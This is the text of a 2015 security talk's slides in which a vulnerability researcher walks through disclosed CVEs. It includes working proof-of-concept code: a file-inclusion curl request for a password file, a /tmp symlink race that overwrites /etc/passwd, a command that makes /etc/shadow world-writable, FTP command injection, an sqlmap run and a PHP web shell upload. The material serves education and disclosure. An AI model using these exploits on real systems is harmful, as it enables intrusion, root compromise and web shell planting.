Fun with Exploits Old and NewHow software is expected to behave, how it really behaves and how we can exploit it

Larry W. Cashdollar11/13/2015

V1.9

Who Am I• 15 years at Akamai Technologies• Hobbyist Vulnerability Researcher• 100+ Vulnerabilities discovered• Formerly Unix Systems Administrator 17 years • Penetration Tester Back in Late 90s• Enjoy Writing and Breaking Code

• This is my second time speaking in public

Terminology

• CVE – Common Vulnerabilities and Exposure• Root shell – gaining access to administrative

user on Unix system• Web shell – a web based shell used to access

the system via HTTP• Vulnerability – A flaw in a piece of software• PoC – Proof of Concept

What is this all about?

• Concepts• Methodologies• Mind set• How can I break this?

• Think like a hacker

Why bother hacking stuff?

• Improves software security • Improves stability• It’s like solving a puzzle• Can be a lot of fun• Improves your skills• And……..

Exploiting a vulnerability you found feels like

Some common Vulnerabilities

• LFI (Local File Inclusion)• RFI (Remote File Inclusion)• RCE (Remote Command Execution)• Race Condition• SQL Injection• XSS (Cross Site Scripting)• Command Injection

Concepts

• Unchecked User Input• User Input is expected to behave • Abuse Program Flow• Unintended functionality• Abuse software privilege

Examples: Old

IRIX Midikeys: CVE 1999-0765

CVE: 1999-0765 setuid root binary abuse

• Binary executes with root privileges

• Allows modification of sensitive system files

Exploit CVE-1999-0765

• Open /etc/passwd as a .wav file• Or export WINEDITOR=/usr/X11/bin/xterm

Sawmill LFI & weak encryption CVE-2000-0589 & 0588

• Log analysis server listens on port 8987• LFI can read first line of any word readable file• Admin password stored in local file• Admin password encrypted with custom

algorithm

Exploiting CVE-2000-0589 & 0588 • $ curl http://192.168.1.65:8987/sawmill?rfcf+%22/etc

/sawmill/adminpwd.db%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

• Returns encrypted password Am@duZw• Simple substitution cypher

• Wrote code to decrypt… for my palm pilot IIIxe

PoC for CVE-2000-0589 & 0588 1. #include <stdio.h>2. 3. char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|"; 4. char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";5. 6. int7. main (int argc, char **argv)8. {9. 10. int x, y;11. char cypher[128];12. 13. strncpy (cypher, argv[1], 128);14. 15. for (x = 0; x < strlen (cypher); x++) {16. 17. for (y = 0; y < strlen (encode); y++)18. if (cypher[x] == encode[y]){19. printf ("%c", alpha[y]);20. break;21. }22. }23. 24. printf("\n\"+\" could also be a space [ ]\n");25. }

• Decrypted password was ‘wookie’• Access to modify administrative control panel• Developer gave me a free license

Solaris catman file clobbering vulnerability CVE-2000-0095

• Creates files in /tmp insecurely • Uses guessable filenames• Doesn’t check to see if file already exists• Creates files in /tmp as /tmp/sman_PID• We can guess next filename and symlink to

/etc/passwd

PoC1. #!/usr/local/bin/perl -w 2. # http://vapid.dhs.org 3. $clobber = "/etc/passwd"; 4. #file to clobber5. $X=getpgrp(); 6. $Xc=$X; 7. #Constant 8. $Y=$X+1000;9. #Constant 10. while($X < $Y) { 11. print "Linking /tmp/sman_$X to $clobber :"; 12. # Change $clobber to what you want to clobber. 13. if (symlink ($clobber, "/tmp/sman_$X")) { 14. print "Sucess\n"; 15. } else 16. { 17. print "failed, Busy system?\n";18. } 19. $X=$X+1; 20. } 21. #Watch /tmp and see if catman is executed in time. 22. while(1) { 23. $list = "/usr/bin/ls -l /tmp | grep sman|grep root |"; 24. open (list,$list) or "die cant open ls...\n"; 25. while(<list>) { 26. @args = split "_",$_; 27. chop ($args[1]); 28. if ($args[1] >= $Xc && $args[1] <= $Y)29. { 30. print "Looks like pid $args[1] is the winner\n cleaning....\n";31. `/usr/bin/rm -f /tmp/sman*`; 32. exit(1); 33. } 34. } 35. }

Exploit Results

• /etc/passwd overwritten with contents of sman_pid

• System hosed

Exploits: New

Centrify CVE-2012-6348 /tmp race condition local root

• Administrative control daemon for system management

• Creates a file in /tmp as centrify.cmd.0• Executes that file as shell script!• Executes as root!

CVE-2012-6348 PoC Wins race condition 50% of the time:$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done

After the system is refreshed via administrative control job:

$ ls -l /etc/shadow-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow

CVE-2012-6348 Better PoC

• Wins race condition 100% of the time• Written in C• Uses inotify() to detect file modification and

creation• Too long to display here

Ftpd ruby gem command injection CVE-2013-2512

• FTP server developed in ruby• Code examination reveals remote command injection

208 def ls(ftp_path, option)209 path = expand_ftp_path(ftp_path)210 dirname = File.dirname(path)211 filename = File.basename(path)212 command = [213 'ls',214 option,215 filename, <-- unsanitized user controlled input216 '2>&1',217 ].compact.join(' ')218 if File.exists?(dirname) <- file has to exist to exec ls command219 list = Dir.chdir(dirname) do220 `{command}` <-- passed to shell here

CVE-2013-2512 PoC$ ftp localhostConnected to localhost.220 ftpdName (localhost:root): anonymous331 Password requiredPassword:230 Logged inRemote system type is UNIX.Using binary mode to transfer files.* I already created the filename foobar by uploading a fileftp> ls foobar;id200 PORT command successful150 Opening ASCII mode data connection-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdfuid=0(root) gid=0(root) groups=0(root)226 Transfer complete

wp-powerplaygallery vulnerable SQL injection code CVE 2015-5599

131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";

133 : $wpdb->query($query);

Blind SQLi Exploit

• Sqlmap

$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 –risk 3

wp-powerplaygallery vulnerable RFI Code CVE-2015-5681

50 $targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder'; 51 $cleanupTargetDir = true; // Remove old files 52 $maxFileAge = 5 * 3600; // Temp file age in seconds 53 54 // Create target dir 55 if (!file_exists($targetDir)) { 56 @mkdir($targetDir); 57 }.148: // Read binary input stream and append it to temp file149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');151: }. 158: while ($buff = fread($in, 4096)) {159: fwrite($out, $buff);160: }

RFI Exploit Requirements

• POST request• Variable albumid must point at existing album

in database• File to upload must exist locally• Use c99 shell as our payload• file variable contains payload with local full

path• name variable contains our filename

PoC Exploit1. <?php2. $target_url =

'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';3. $file_name_with_full_path = '/var/www/shell.php’;4. echo "POST to $target_url $file_name_with_full_path";5. $post = array('albumid'=>’4' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);6. $ch = curl_init();7. curl_setopt($ch, CURLOPT_URL,$target_url);8. curl_setopt($ch, CURLOPT_POST,1);9. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);10. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);11. $result=curl_exec ($ch);12. curl_close ($ch);13. echo "<hr>";14. echo $result;15. echo "<hr>";16. ?>

Questions?

• larry0@me.com• http://www.vapidlabs.com• Twitter @_larry0